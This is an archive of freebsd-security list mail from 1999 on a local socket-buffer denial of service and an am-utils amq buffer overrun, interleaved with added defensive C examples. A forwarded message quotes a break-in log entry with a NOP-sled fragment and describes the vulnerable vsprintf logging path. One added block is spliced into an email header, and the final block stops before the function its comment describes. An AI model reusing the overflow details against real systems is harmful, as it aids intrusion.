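int sb_charge(struct sb_pool *p, uint32_t uid, uint64_t bytes)
{
    struct sb_acct *a = sb_slot(p, uid, 1);
    uint64_t pool_avail, pool_room;
    if (a == NULL) return -ENOBUFS;               /* accounting table full */
    if (uid != 0 && bytes > p->per_uid - a->used) goto refuse;
    pool_avail = (uid == 0) ? p->total : p->total - p->reserve;
    pool_room = (p->in_use < pool_avail) ? pool_avail - p->in_use : 0;
    if (bytes > pool_room) goto refuse;
    a->used += bytes;
    p->in_use += bytes;
    return 0;
refuse:
    if (a->used == 0) a->live = 0;                /* don't keep an empty row */
    return -ENOBUFS;
}

/* Release a charge; clamped to what the uid actually holds so a buggy or
 * double-freeing caller cannot drive the counters below zero. */
void sb_release(struct sb_pool *p, uint32_t uid, uint64_t bytes)
{
    struct sb_acct *a = sb_slot(p, uid, 0);
    if (a == NULL) return;
    if (bytes > a->used) bytes = a->used;
    a->used -= bytes;
    p->in_use -= bytes;
    if (a->used == 0) a->live = 0;
}

int main(void)
{
    /* Constructed sizes: 1 MB pool, 128 kB root reserve, 256 kB per uid,
     * each "socket" asking for a 64 kB buffer.  Four users fill the non-root
     * share (896 kB) and are refused; root still gets a buffer from the reserve. */
    struct sb_pool p;
    uint32_t uid;
    int n;
    sb_init(&p, 1u << 20, 128u << 10, 256u << 10);
    for (uid = 1001; uid <= 1004; uid++) {
        for (n = 0; sb_charge(&p, uid, 64u << 10) == 0; n++)
            ;
        printf("uid %u: %d sockets, %llu bytes, pool in use %llu\n", uid, n,
               (unsigned long long)sb_used(&p, uid), (unsigned long long)p.in_use);
    }
    printf("root: %s\n", sb_charge(&p, 0, 64u << 10) == 0 ? "got a buffer from the reserve" : "refused");
    return 0;
}
```

The per-uid cap answers Garrett's "at what level" with the credential's uid, and the reserve means a full pool still leaves root able to open the socket it needs to log in and clean up, which is the property the reserved-blocks analogy is really about. Whether to charge at socket creation or only when data is queued (Don's write()/send() variant) is a policy choice; the same charge/release pair serves either.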
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199909020205.TAA08666@salsa.gv.tsc.tdk.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

>Do you enforce an mbuf limit block write()/send*() when the limit is
>reached? What about packets received over the network, do they get
>tossed? Do you kill the process with the most mbufs when a shortage
>occurs ;-)

How do other OSes handle it? I recall in the original thread that the user
tried it out on LINUX, and it handled the code without incident.

---Mike

**********************************************************************
Mike Tancsa, Network Admin      *  mike@sentex.net
Sentex Communications Corp,     *  http://www.sentex.net/mike
Cambridge, Ontario              *  01.519.651.3400
Canada                          *

From owner-freebsd-security Wed Sep 1 19:12:35 1999
Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 4CE1714E9F for ; Wed, 1 Sep 1999 19:12:33 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com)
Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 9E9A61C0E; Wed, 1 Sep 1999 21:14:53 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 8EFBA3817; Wed, 1 Sep 1999 21:14:53 -0400 (EDT)
Date: Wed, 1 Sep 1999 21:14:53 -0400 (EDT)
From: Bill Fumerola
To: Don Lewis
Cc: Garrett Wollman, Nick Hibma, FreeBSD -- The Power to Serve, Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <199909020205.TAA08666@salsa.gv.tsc.tdk.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 1 Sep 1999, Don Lewis wrote:

> It should be possible to track the overall socket buffer space for each
> UID, but how do you enforce the limit? Do you cause the socket(),
> socketpair(), accept(), and setsockopt() calls to fail? Will userland
> code react well to this?

Any good code uses errx() or one of its cousins.

53 ECONNABORTED Software caused connection abort. A connection abort was
caused internal to your host machine.

looks like a good thing to return when that is the case.

--
- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Wed Sep 1 20:33:10 1999
Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id 1DAC614EC6 for ; Wed, 1 Sep 1999 20:33:03 -0700 (PDT) (envelope-from geniusj@ods.org)
Received: (qmail 50430 invoked by uid 1000); 1 Sep 1999 23:35:14 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 23:35:14 -0000
Date: Wed, 1 Sep 1999 19:35:14 -0400 (EDT)
From: Systems Administrator
To: Mike Tancsa
Cc: FreeBSD -- The Power to Serve, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <4.1.19990901212536.04e852f0@granite.sentex.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

You should raise nmbclusters as well as do the accounting

------------------------------------------------------------------------------
Jason DiCioccio              | geniusj@free-bsd.org
FreeBSD - The Power to Serve | http://www.freebsd.org
                             | http://www.ods.org
------------------------------------------------------------------------------

On Wed, 1 Sep 1999, Mike Tancsa wrote:

> At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote:
> >Explain what you mean? That is what login classes are for, you don't have
> >to put "nobody" in a limited class if this is what you mean.. And you can
> >set internal limits in apache if that's what you mean.. I feel you mean
> >either one but I don't know :)
>
> I mean that putting the web user (in my case user webuser-- a UID <>
> nobody) in a login.conf set class would seemingly be very restrictive. In
> my tests, I had to set a user to have less than 16 open files and ~ 5
> processes max to prevent them from crashing a 3.x stable box. These sorts
> of limits to me at first glance would be unworkable in apache.
>
> ---Mike
>
> >On Wed, 1 Sep 1999, Mike Tancsa wrote:
> >
> >> At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> >> >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU
> >> >time so you can limit that too.. It will never crash the system with the
> >> >proper limits set :). They can run it all they want.
> >>
> >> Well, that sort of helps for kids just doing ./a.out, but would you put
> >> accounting limits on your web server? That seems like a nasty can of
> >> configuration worms one would be opening no?
> >>
> >> ---Mike
> >>
> >> >On Wed, 1 Sep 1999, Mike Tancsa wrote:
> >> >
> >> >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> >> >> >If you have public access users, you should have login accounting in the
> >> >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> >> >> >with my login accounting setup..
> >> >>
> >> >> How does accounting stop it? Or do you mean it just discourages users
> >> >> from doing it? How much overhead does accounting add to the system?
> >> >> Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> >> >> is essentially a resource starving issue (e.g. fork bomb)
> >> >>
> >> >> ---Mike
> >> >> ------------------------------------------------------------------------
> >> >> Mike Tancsa, tel 01.519.651.3400
> >> >> Network Administrator, mike@sentex.net
> >> >> Sentex Communications www.sentex.net
> >> >> Cambridge, Ontario Canada
> >>
> >> ------------------------------------------------------------------------
> >> Mike Tancsa, tel 01.519.651.3400
> >> Network Administrator, mike@sentex.net
> >> Sentex Communications www.sentex.net
> >> Cambridge, Ontario Canada
>
> **********************************************************************
> Mike Tancsa, Network Admin      *  mike@sentex.net
> Sentex Communications Corp,     *  http://www.sentex.net/mike
> Cambridge, Ontario              *  01.519.651.3400
> Canada                          *

From owner-freebsd-security Wed Sep 1 20:33:34 1999
Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id 1CA7B152C6 for ; Wed, 1 Sep 1999 20:33:27 -0700 (PDT) (envelope-from geniusj@ods.org)
Received: (qmail 50442 invoked by uid 1000); 1 Sep 1999 23:36:00 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 23:36:00 -0000
Date: Wed, 1 Sep 1999 19:36:00 -0400 (EDT)
From: Systems Administrator
To: Joe Gleason
Cc: Nick Hibma, FreeBSD -- The Power to Serve, Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <019d01bef4e1$46125ca0$256b52c6@tasam.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

They don't ship with a lot of mbufs to keep it running on slower and
less-capable machines.

------------------------------------------------------------------------------
Jason DiCioccio              | geniusj@free-bsd.org
FreeBSD - The Power to Serve | http://www.freebsd.org
                             | http://www.ods.org
------------------------------------------------------------------------------

On Wed, 1 Sep 1999, Joe Gleason wrote:

> True, I consider myself an atypical Joe, but still the point is valid that
> a FreeBSD should be fairly resilient and stable without needing to do a lot
> of tweaking. There is also the argument that setting restrictions by default
> could mess up people who don't know to look at the restrictions when
> something doesn't work. Probably some happy medium could be achieved.
>
> I think I would be happy with a default config in which:
> The average unprived user could not crash the system, but they could use
> a lot of resources and slow the system down drastically.
>
> Joe Gleason
> Tasam
>
> > The average Joe doesn't run FreeBSD
> >
> > ------------------------------------------------------------------------------
> > Jason DiCioccio              | geniusj@free-bsd.org
> > FreeBSD - The Power to Serve | http://www.freebsd.org
> >                              | http://www.ods.org
> > ------------------------------------------------------------------------------
> >
> > On Wed, 1 Sep 1999, Nick Hibma wrote:
> >
> > > That's one of the comments Microsoft makes when a security hole is
> > > discovered, switch off that, increase the security level here. It always
> > > makes me kind of mad, because that's not what the Joe Average does or
> > > is considers something he should do until it's too late.
> > >
> > > One of the features I like about Unix is for example free space
> > > available solely to the root user. It could be imagined that these
> > > things also apply to file handles, memory/swap space and other scarce
> > > resources.
> > >
> > > Nick
> > >
> > > > Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU
> > > > time so you can limit that too.. It will never crash the system with the
> > > > proper limits set :). They can run it all they want.
> > > >
> > > > On Wed, 1 Sep 1999, Mike Tancsa wrote:
> > > >
> > > > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> > > > > >If you have public access users, you should have login accounting in the
> > > > > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> > > > > >with my login accounting setup..
> > > > >
> > > > > How does accounting stop it? Or do you mean it just discourages users
> > > > > from doing it? How much overhead does accounting add to the system?
> > > > > Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> > > > > is essentially a resource starving issue (e.g. fork bomb)
> > > > >
> > > > > ---Mike
> > > > > ------------------------------------------------------------------------
> > > > > Mike Tancsa, tel 01.519.651.3400
> > > > > Network Administrator, mike@sentex.net
> > > > > Sentex Communications www.sentex.net
> > > > > Cambridge, Ontario Canada
> > >
> > > --
> > > e-Mail: hibma@skylink.it

From owner-freebsd-security Wed Sep 1 20:36:27 1999
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B881514EC6 for ; Wed, 1 Sep 1999 20:36:23 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA08433; Wed, 1 Sep 1999 23:35:05 -0400 (EDT) (envelope-from wollman)
Date: Wed, 1 Sep 1999 23:35:05 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199909020335.XAA08433@khavrinen.lcs.mit.edu>
To: Don Lewis
Cc: freebsd-security@FreeBSD.ORG
Subject: socket buffer limits (was: Re: FW: Local DoS in FreeBSD)
In-Reply-To: <199909020205.TAA08666@salsa.gv.tsc.tdk.com>
References: <199909020205.TAA08666@salsa.gv.tsc.tdk.com>

< said:

[Just to recap, I wrote:]

1) At what level do you impose this limit?
2) Should the limit be statistical or exact?
3) What is a sensible default value?

[Don replied:]

> A fairly simple, short term measure would be to have a per-UID limit on the
> size of socket buffers. [...]

Right -- this is a cheap thing to do, which happens to be rather bad for
performance in the long term. (RTT on my network between two
gigabit-attached servers is ~1 ms, thus the pipe size is already 60 kb.
For a 100-Mbit/s path to California, the pipe is about 420 kb.)

> Maybe there should be a potentially tighter per-UID limit on sockets than
> the overall descriptor limit, since sockets consume quite a bit more
> kernel resources than descriptors.

I don't think this is a significantly useful limit to impose -- at present,
the expensive resource is mbuf clusters, and I don't see that changing in
principle any time soon.

> It should be possible to track the overall socket buffer space for each
> UID, but how do you enforce the limit?

The problem with this approach is that socket buffer allotments are
effectively free. Thus, you are limiting a resource which doesn't have a
natural limit. I'd put it in the same category of short-term kluge as
limiting individual socket buffers. Ideally, you'd like users to be able
to request huge socket buffers to take advantage of fat pipes, while still
limiting their overall usage. One way would be to pre-allocate a buffer
pool which is shared by all the user's sockets; however, this is a very bad
thing to do from a protocol design perspective, since it may be preferable
to use interface memory and that may in turn be in short supply.

> Do you cause the socket(), socketpair(), accept(), and setsockopt()
> calls to fail?

Clearly accept() cannot fail, since a new connection over-quota would have
to be rejected in sonewconn() in order to have any useful effect. There is
an argument to be made for the others to simply shrink the buffers to a
workable-but-tiny value (say, one or two mbuf clusters' worth), which will
allow users to communicate very slowly but won't fail. (This is preferable
from a fail-safe standpoint as well. If a cracker uses up all of `daemon's
mbuf quota, you still want daemons to be able to do their thing, which
might have something to do with telling you about the attack.)

> Do you enforce an mbuf limit block write()/send*() when the limit is
> reached? What about packets received over the network, do they get
> tossed?

I believe the correct long-term model is actually to use a random early
detection mechanism on incoming packets. Users would then have a two-level
buffer size limit: at level l1, writes block (or return an error if the
socket is in non-blocking mode) and incoming data is dropped according to
the RED algorithm; at level l2, writes block and incoming data is dropped.
(In protocols like TCP you obviously have to do this in a protocol-aware
fashion to avoid deadlock.)

The difficulty with this approach is: 1) finding all the places where
socket buffers are touched to make sure the right thing happens, and 2)
doing it in such a way which is not intimately tied to the existing
(losing) socket buffer model.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                     - Susan Aglukark and Chad Irschick

From owner-freebsd-security Wed Sep 1 20:39:32 1999
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id EC41914FDA for ; Wed, 1 Sep 1999 20:39:29 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA08451; Wed, 1 Sep 1999 23:39:28 -0400 (EDT) (envelope-from wollman)
Date: Wed, 1 Sep 1999 23:39:28 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199909020339.XAA08451@khavrinen.lcs.mit.edu>
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <4.1.19990901191051.04e80570@granite.sentex.ca>
References: <199909012046.QAA07324@khavrinen.lcs.mit.edu> <4.1.19990901191051.04e80570@granite.sentex.ca>

< said:

> Do you think these changes would be incorporated into the 3.x branch, or
> strictly 4.x?

By the time the work actually gets done, 3.x will be history. Like I said,
it's hard.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                     - Susan Aglukark and Chad Irschick

From owner-freebsd-security Wed Sep 1 20:49:31 1999
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id E5F6814FDA for ; Wed, 1 Sep 1999 20:49:22 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au)
Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id NAA23859; Thu, 2 Sep 1999 13:47:10 +1000 (EST)
From: Darren Reed
Message-Id: <199909020347.NAA23859@cheops.anu.edu.au>
Subject: Re: socket buffer limits (was: Re: FW: Local DoS in FreeBSD)
To: wollman@khavrinen.lcs.mit.edu (Garrett Wollman)
Date: Thu, 2 Sep 1999 13:47:10 +1000 (EST)
Cc: Don.Lewis@tsc.tdk.com, freebsd-security@FreeBSD.ORG
In-Reply-To: <199909020335.XAA08433@khavrinen.lcs.mit.edu> from "Garrett Wollman" at Sep 1, 99 11:35:05 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text

How about failing setsockopt's when they try to increase buffer space
if it would mean buffer space commitments would exceed a high water mark?

Also, what if mbufs are dropped and/or send/write fails (ENOBUFS) if there
is nobody waiting to receive data and a high water mark has been reached?

Darren

From owner-freebsd-security Wed Sep 1 21:32:14 1999
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 9B42214CB0 for ; Wed, 1 Sep 1999 21:32:12 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id AAA08736; Thu, 2 Sep 1999 00:31:35 -0400 (EDT) (envelope-from wollman)
Date: Thu, 2 Sep 1999 00:31:35 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199909020431.AAA08736@khavrinen.lcs.mit.edu>
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: socket buffer limits (was: Re: FW: Local DoS in FreeBSD)
In-Reply-To: <199909020347.NAA23859@cheops.anu.edu.au>
References: <199909020335.XAA08433@khavrinen.lcs.mit.edu> <199909020347.NAA23859@cheops.anu.edu.au>

< said:

> How about failing setsockopt's when they try to increase buffer space
> if it would mean buffer space commitments would exceed a high water mark?

That's no different from what I dismissed in my reply to Don. We don't
want to restrict the potential TCP window a user may offer, just how much
actual kernel memory he may tie up at once.

> Also, what if mbufs are dropped and/or send/write fails (ENOBUFS) if there
> is nobody waiting to receive data and a high water mark has been reached?

POLA violation for sure. (TCP should be rewritten, however, to use the
receiver's advertised window for user push-back, but that's at least a
full-time person-year's worth of work to write, test, and tune. That would
mean that loopback connections could only use one window's-worth of kernel
memory for buffering.)

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                     - Susan Aglukark and Chad Irschick

From owner-freebsd-security Thu Sep 2 00:35:51 1999
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3E55114D41 for ; Thu, 2 Sep 1999 00:35:48 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id JAA94099; Thu, 2 Sep 1999 09:32:37 +0200 (CEST) (envelope-from des)
To: Systems Administrator
Cc: "L. Sassaman", FreeBSD -- The Power to Serve, Jeff Wheat, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
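The per-UID socket-buffer accounting debated in the messages above (Don's per-UID tracking, Garrett's two-level l1/l2 scheme with RED on incoming data and shrink-rather-than-fail for new sockets, Darren's high-water mark) as a small user-space model. This is an added example, not FreeBSD kernel code; the uidq_* names, the linear RED drop ramp between l1 and l2, and the constructed limits are assumptions.

```c
/*
 * Added example (not FreeBSD code): a user-space model of per-UID socket
 * buffer accounting as sketched in the thread above.  Below l1 all traffic
 * is charged normally.  Between l1 and l2 writers are told to block (EAGAIN
 * for non-blocking sockets) and incoming data is dropped RED-style with a
 * probability that ramps linearly from 0 at l1 to 1 at l2 (the linear ramp
 * is our assumption; classic RED also averages the queue size).  At l2 and
 * above incoming data is always dropped.  New sockets that would push the
 * UID over l1 get a tiny buffer instead of an error, as Garrett suggested.
 * Function and type names (uidq_*) are ours.
 */
#include <stddef.h>
#include <stdint.h>

#define MCLBYTES 2048u          /* mbuf cluster size of the era (i386) */

struct uid_quota {
    uint64_t used;              /* socket buffer bytes charged to this UID */
    uint64_t l1;                /* soft limit: writers block, RED on input */
    uint64_t l2;                /* hard limit: all input dropped */
    uint32_t rng;               /* PRNG state; a fixed seed keeps runs reproducible */
};

enum charge_result { CHARGE_OK = 0, CHARGE_BLOCK = 1, CHARGE_DROP = 2 };

/* xorshift32: good enough for a model; a kernel would use its own source. */
static uint32_t uidq_rand(struct uid_quota *q)
{
    uint32_t x = q->rng ? q->rng : 0x9e3779b9u;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    q->rng = x;
    return x;
}

/* Outgoing data (write()/send*()): charge if it fits under l1, else block. */
enum charge_result uidq_charge_send(struct uid_quota *q, size_t bytes)
{
    if (q->used + bytes > q->l1)
        return CHARGE_BLOCK;    /* sleep, or EAGAIN if non-blocking */
    q->used += bytes;
    return CHARGE_OK;
}

/* Incoming data: accept under l1, RED between l1 and l2, drop at l2. */
enum charge_result uidq_charge_recv(struct uid_quota *q, size_t bytes)
{
    uint64_t after = q->used + bytes;
    if (after <= q->l1) {
        q->used = after;
        return CHARGE_OK;
    }
    if (after >= q->l2)
        return CHARGE_DROP;
    /* drop with probability (after - l1) / (l2 - l1) */
    uint64_t span = q->l2 - q->l1;
    if ((uint64_t)uidq_rand(q) % span < after - q->l1)
        return CHARGE_DROP;
    q->used = after;
    return CHARGE_OK;
}

/* An application read or a peer ACK frees buffer space back to the UID. */
void uidq_release(struct uid_quota *q, size_t bytes)
{
    q->used = (bytes >= q->used) ? 0 : q->used - bytes;
}

/* socket()/setsockopt(SO_SNDBUF): grant the request, or shrink to a
 * workable-but-tiny two clusters rather than failing the call. */
size_t uidq_grant_sockbuf(const struct uid_quota *q, size_t requested)
{
    if (q->used + requested <= q->l1)
        return requested;
    return 2 * MCLBYTES;
}

/* Push n incoming segments of seg bytes; return how many were dropped. */
unsigned uidq_simulate_recv(struct uid_quota *q, unsigned n, size_t seg)
{
    unsigned drops = 0;
    for (unsigned i = 0; i < n; i++)
        if (uidq_charge_recv(q, seg) == CHARGE_DROP)
            drops++;
    return drops;
}
```

With l1 = 64 KB and l2 = 128 KB, 1000 incoming 1 KB segments leave the UID somewhere between the two levels: the first 64 are always accepted, at most 127 can ever be accepted, and the rest are dropped.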
From: Dag-Erling Smorgrav
Date: 02 Sep 1999 09:32:37 +0200
In-Reply-To: Systems Administrator's message of "Wed, 1 Sep 1999 15:12:03 -0400 (EDT)"
Lines: 10
X-Mailer: Gnus v5.5/Emacs 19.34

Systems Administrator writes:
> If you have it set so that it does SUID for cgi and runs it as the user or
> uses the users accounting limits, it won't work.. and yes, you should set
> some sensible apache limits per user on that stuff, I know it's possible.

Apache's suEXEC wrapper doesn't enforce user limits.

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Thu Sep 2 01:37:06 1999
Received: from hera.ik.bme.hu (hera.ik.bme.hu [152.66.243.132]) by hub.freebsd.org (Postfix) with ESMTP id 8D00814C0C for ; Thu, 2 Sep 1999 01:36:57 -0700 (PDT) (envelope-from mohacsi@hera.ik.bme.hu)
Received: from localhost (mohacsi@localhost) by hera.ik.bme.hu (8.9.3/8.9.3) with ESMTP id KAA12922 for ; Thu, 2 Sep 1999 10:36:51 +0200 (MET DST)
Date: Thu, 2 Sep 1999 10:36:49 +0200 (MET DST)
From: Mohacsi Janos
To: freebsd-security@freebsd.org
Subject: amd buffer overflow some Linuxes, in FreeBSD too?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hi,
There are some reports that amd is vulnerable to a stack overflow remote root
exploit attack in some Linux distributions.
http://linuxtoday.com/stories/9440.html
Can somebody check whether the FreeBSD version is also vulnerable? As I see
on the amd-dev list, the amq -M code is the origin of the remote root exploit.

snip from amd-dev list archive:
---------------------------------------------------------------------------
From: Erez Zadok
To: Douglas Alan
Cc: ezk@shekel.mcl.cs.columbia.edu, amd-dev@cs.columbia.edu
Subject: Re: am-utils security hole?
Sender: amd-dev-owner@cs.columbia.edu
Precedence: bulk
X-majordomo-list: amd-dev from majordomo.cs.columbia.edu

In message <199908241739.NAA21639@space.mit.edu>, Douglas Alan writes:
> Hi. Have you heard anything about an am-utils buffer overrun security
> hole? Our RedHat 6.0 computers have all been broken into, apparently
> using a bug in amq. Here is the suspicious log entry from
> /var/log/messages:
>
> Aug 21 20:49:51 lagavulin 27>Aug 21 20:49:51 amd[3531]: amq requested
> mount of
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> [...]
> ^C
>
> |>oug

I verified that the amd distributed with redhat 6.0 is indeed compiled
without ENABLE_AMQ_MOUNT. This is the routine that logged the message you
reported:

#ifdef ENABLE_AMQ_MOUNT
#else /* not ENABLE_AMQ_MOUNT */
int *
amqproc_mount_1_svc(voidp argp, struct svc_req *rqstp)
{
  static int rc;
  char *s = *(amq_string *) argp;

  plog(XLOG_ERROR, "amq requested mount of %s, but code is disabled", s);
  rc = EINVAL;
  return &rc;
}
#endif /* not ENABLE_AMQ_MOUNT */

What I find strange is that your logs don't show the "but code is disabled"
part. This is probably b/c the string 's' overran the plog (vsprintf)
buffer.

Another strange thing I found was that as far as I can tell, the amq -M rpc
message uses xdr_amq_string exclusively. This xdr routine uses
xdr_string(..., AMQ_STRLEN), and AMQ_STRLEN is 1024. That is, I limit the
maximum size of an amq rpc message that can be passed to amd. What I'm not
sure, however, is if xdr_string will handle a string passed to it that is
_exactly_ 1024 bytes long, leaving no space for a terminating null.

Anyway, I believe that this buffer overrun was triggered in real_plog(),
while logging the message, not in the xdr/rpc code. real_plog() uses temp
buffers of a fixed maximum size (1024 bytes), and calls vsprintf(ptr, efmt,
vargs); it is this 'ptr' that has a maximum length. But efmt+vargs can be
exploited to expand into a string that's longer than 1024 bytes, thus
overrunning 'ptr'. I cannot think of a clean way to make sure vsprintf
expands a string up to a given length. Anyone?

Nevertheless, the safest thing IMHO is to simply avoid including any amq -M
code unless the ENABLE_AMQ_MOUNT option is turned on (via configure
--enable-amq-mount). So this is what I did:

(1) amq/amq.c: while the usage() string hides the -M option if
    ENABLE_AMQ_MOUNT is off, getopt() was still processing -M. Duh.

(2) amd/amq_svc.c (amq_program_1): the RPC dispatch routine still processed
    amq -M requests, but then called a version of amqproc_mount_1_svc that
    simply printed "... but code is disabled." I conditionalized the
    dispatching into amqproc_mount_1_svc on #ifdef ENABLE_AMQ_MOUNT.

(3) amd/amq_subr.c: completely removed the amqproc_mount_1_svc() routine
    that's called when ENABLE_AMQ_MOUNT is not on.

The above fixes are now in 6.0.1s11. While they were not thoroughly tested,
I think they are much safer than anything prior to s11, and certainly prior
to s10.

There may be other possible exploits in the amq/amd RPC interface. I don't
have the time now to inspect and analyze them all, but if anyone finds
something bad, please send patches. Also, if more security fixes will come
up in the next few days, I'll probably have to cut more 6.0.1 snapshots.
---------------------------------------------------------------------------

Thanks,
Janos Mohacsi

From owner-freebsd-security Thu Sep 2 04:45:18 1999
Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 4D86514F02; Thu, 2 Sep 1999 04:45:02 -0700 (PDT) (envelope-from ks@chg.ru)
Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.3/8.9.1) with ESMTP id PAA20293; Thu, 2 Sep 1999 15:44:51 +0400 (MSD)
X-Mailer: XFMail 1.3 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
Date: Thu, 02 Sep 1999 15:42:44 +0400 (MSD)
Organization: Landau Institute for Theoretical Physics
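On the vsprintf() question in the forwarded amd-dev message above (real_plog() formatting into a fixed 1024-byte buffer): a bounded formatter of the same shape, which answers "how do I make sure the expansion stays within a given length" with vsnprintf(). This is an added example, not am-utils code; the names safe_plog, PLOG_BUFSZ and plog_result are ours, and the 1024-byte input is constructed to match the AMQ_STRLEN bound Erez mentions.

```c
/*
 * Added example, not am-utils code.  real_plog() formatted into a fixed
 * 1024-byte buffer with vsprintf(), which has no bound, so a caller-supplied
 * string longer than the buffer overran it.  vsnprintf() bounds the write
 * and returns the length the full message would have needed, which is how
 * truncation is detected.  Names (safe_plog, PLOG_BUFSZ, plog_result) are ours.
 */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define PLOG_BUFSZ 1024         /* same size class as the am-utils temp buffer */

struct plog_result {
    char   buf[PLOG_BUFSZ];     /* always NUL-terminated after a successful call */
    size_t needed;              /* bytes the full message would have needed */
    int    truncated;           /* 1 if the message did not fit */
};

/* Bounded counterpart of "vsprintf(ptr, efmt, vargs)". */
static int safe_vplog(struct plog_result *r, const char *fmt, va_list ap)
{
    int n = vsnprintf(r->buf, sizeof r->buf, fmt, ap);
    if (n < 0) {                /* encoding error: leave an empty, terminated buffer */
        r->buf[0] = '\0';
        r->needed = 0;
        r->truncated = 0;
        return -1;
    }
    r->needed = (size_t)n;
    r->truncated = (size_t)n >= sizeof r->buf;
    return 0;
}

int safe_plog(struct plog_result *r, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int rc = safe_vplog(r, fmt, ap);
    va_end(ap);
    return rc;
}

/* "Make sure vsprintf expands a string up to a given length": vsnprintf with
 * a zero-size buffer reports the expansion length without writing anything. */
size_t plog_expansion_length(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return n < 0 ? 0 : (size_t)n;
}

/* Constructed input: an amq string of exactly AMQ_STRLEN (1024) bytes, the
 * largest the XDR layer lets through.  Even this bounded string plus the
 * fixed text of the log message exceeds a 1024-byte buffer, which is why
 * the XDR limit alone did not protect real_plog().  Returns the truncated flag. */
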